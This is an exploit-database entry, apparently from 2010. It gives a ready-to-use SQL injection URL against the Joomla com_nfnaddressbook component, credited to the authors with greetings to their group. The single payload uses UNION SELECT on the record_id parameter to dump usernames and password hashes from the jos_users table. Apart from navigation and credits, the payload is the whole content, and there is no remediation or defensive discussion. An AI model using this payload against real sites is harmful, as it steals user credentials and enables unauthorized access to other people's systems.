[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla com_nfnaddressbook Remote Sql Injection Vulnerability
# Published : 2010-03-14
# Author : Snakespc
# Previous Title : DesktopOnNet 3 Beta9 Local File Include Vulnerability
# Next Title : RogioBiz_PHP_file_manager_V1.2 bypass admin exploit
==============================================================================
[?] Joomla com_nfnaddressbook Remote Sql Injection Vulnerability
==============================================================================
[?] Script: [Joomla]
[?] Language: [ PHP ]
[?] Founder: [ Snakespc Email:super_crist4l@hotmail.com - Site:sec-war.com/cc> ]
[?] Greetz to:[ DrEadFul, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
###########################################################################
===[ Exploit ]===
[?] http://localhost/joomla/index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=-4+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--
[?]Author: DrEadFul<-
###########################################################################